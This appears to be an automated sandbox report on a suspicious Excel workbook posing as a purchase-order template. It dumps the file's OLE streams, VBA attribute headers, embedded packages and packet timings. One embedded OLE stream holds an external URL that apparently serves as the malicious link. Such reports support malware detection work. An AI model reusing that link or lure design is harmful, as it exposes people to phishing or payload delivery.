            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Attribute VB_Name = "Sheet2"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
            VBA File Name:ThisWorkbook.cls
            Stream Size:985
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
            Attribute VB_Name = "ThisWorkbook"
            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            General
            Stream Path:\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:244
            Entropy:2.889430592781307
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
            General
            Stream Path:\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:200
            Entropy:3.2820681057018666
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . [ u . O . . . . . . . . .
            General
            Stream Path:MBD00CB2B2A/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:99
            Entropy:3.631242196770981
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
            General
            Stream Path:MBD00CB2B2A/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:35949
            Entropy:7.720440990481194
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . . h . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            General
            Stream Path:MBD00CB2B2B/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            General
            Stream Path:MBD00CB2B2B/\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:244
            Entropy:2.701136490257069
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
            General
            Stream Path:MBD00CB2B2B/\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:220
            Entropy:3.372234242231489
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
            General
            Stream Path:MBD00CB2B2B/MBD0018D4CE/\x1Ole
            CLSID:
            File Type:data
            Stream Size:20
            Entropy:0.5689955935892812
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . .
            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD00CB2B2B/MBD0018D4CE/\x3ObjInfo
            CLSID:
            File Type:data
            Stream Size:4
            Entropy:0.8112781244591328
            Base64 Encoded:False
            Data ASCII:. . . .
            Data Raw:00 00 03 00
            General
            Stream Path:MBD00CB2B2B/MBD0018D4CE/Contents
            CLSID:
            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
            Stream Size:197671
            Entropy:6.989042939766534
            Base64 Encoded:True
            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            General
            Stream Path:MBD00CB2B2B/MBD0068D442/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.219515110876372
            Base64 Encoded:False
            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
            General
            Stream Path:MBD00CB2B2B/MBD0068D442/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:26243
            Entropy:7.635433729726103
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:248
            Entropy:3.0523231150355867
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:256
            Entropy:4.086306928392587
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:134792
            Entropy:7.974168320310173
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:468
            Entropy:5.269289820125323
            Base64 Encoded:True
            Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
            Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
            CLSID:
            File Type:data
            Stream Size:83
            Entropy:3.0672749060249043
            Base64 Encoded:False
            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
            CLSID:
            File Type:data
            Stream Size:2486
            Entropy:3.9244127831265385
            Base64 Encoded:False
            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
            CLSID:
            File Type:data
            Stream Size:536
            Entropy:6.330646364694152
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
            Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
            General
            Stream Path:MBD00CB2B2B/MBD00726B69/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.219515110876372
            Base64 Encoded:False
            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD00CB2B2B/MBD00726B69/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:26242
            Entropy:7.635424485665502
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD00CB2B2B/Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:283872
            Entropy:7.743278150467805
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            General
            Stream Path:MBD00CB2B2C/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:99
            Entropy:3.631242196770981
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD00CB2B2C/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:45934
            Entropy:7.5587990853484195
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD00CB2B2D/\x1Ole
            CLSID:
            File Type:data
            Stream Size:850
            Entropy:5.7391810575222
            Base64 Encoded:False
            Data ASCII:. . . . p . H ] ' . . . . . . . . . . . . v . . . y . . . K . r . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . S . E . y . Y . c . v . w . 9 . E . v . ? . & . t . i . m . e . l . i . n . e . = . a . d . o . r . a . b . l . e . & . f . e . m . a . l . e . . . 1 e 6 [ J l . S " & B s o 1 . . I ; - o u , h a $ J . . ( _ . j c J { Q O * . e . z . I . > [ E / ` . Z g k k . v e S . ) ~ g x R ) S q ; . D " / . \\ r n . G M . . . B . . . 4 G { . . ) * > . R t W v N m .
            Data Raw:01 00 00 02 a9 70 08 48 9c aa 5d 27 00 00 00 00 00 00 00 00 00 00 00 00 76 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 72 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 53 00 45 00 79 00 59 00 63 00 76 00 77 00 39 00 45 00 76 00 3f 00 26 00 74 00 69 00 6d 00 65 00 6c 00 69 00 6e 00 65 00
            General
            Stream Path:Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:316623
            Entropy:7.998752313231112
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . w c H v a . e . W 1 9 % . 8 . q 0 = a G Q . . R . . . . . . . . . . . . \\ . p . 3 W ] K " . 7 S P J . i ^ ^ U @ X } ( ` d . O N r G . . l . B * , . Z . . b ! . B ) L d . . p V I . ) 8 u n G . 4 I Q Q . m J . / . . B . . . a . . . . . . . = . . . . . s . . . . ( . . / . z { . . . X . . . . 4 . . . . ^ [ . . . . - . . . . . . . = . . . . . . v C N V - . @ . . . J o . . . u V " . . . . C . . . . O K . . . @ . . . 7 1 . . . 9 A . . . > n v 4 . h . R 9 r 1 .
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 8d 90 e6 a8 77 ae 63 48 76 fb 61 0b e3 65 f6 13 88 f6 57 31 39 fe 25 97 18 38 8e 2e e0 71 30 3d 61 47 8f e0 dd 51 c1 84 19 ed 9d cd bb 52 2e 8b e1 00 02 00 b0 04 c1 00 02 00 0d d0 e2 00 00 00 5c 00 70 00 84 d5 33 b0 c1 ab 57 5d 80 4b 22 c8 14 b1 37 53 50 8d f3 4a b4 e0 eb 0e 94 69 5e 5e 55 b1
            Timestamp    Source Port    Dest Port    Source IP    Dest IP
            Dec 16, 2024 10:06:23.876005888 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.888981104 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.889002085 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.889101982 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.889101982 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.889115095 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.889322042 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.904149055 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.904170990 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.904223919 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.904237986 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.904263973 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.904290915 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.919461966 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.919491053 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.919593096 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.919593096 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.919605017 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.919645071 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.933399916 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.933439970 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.933501959 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.933510065 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.933590889 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.948621035 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.948653936 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.948739052 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.948739052 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:23.948745012 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:23.948923111 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.043467045 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.043493032 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.043576956 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.043586016 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.043603897 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.044153929 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.055423021 CET4434972913.107.246.63192.168.2.25
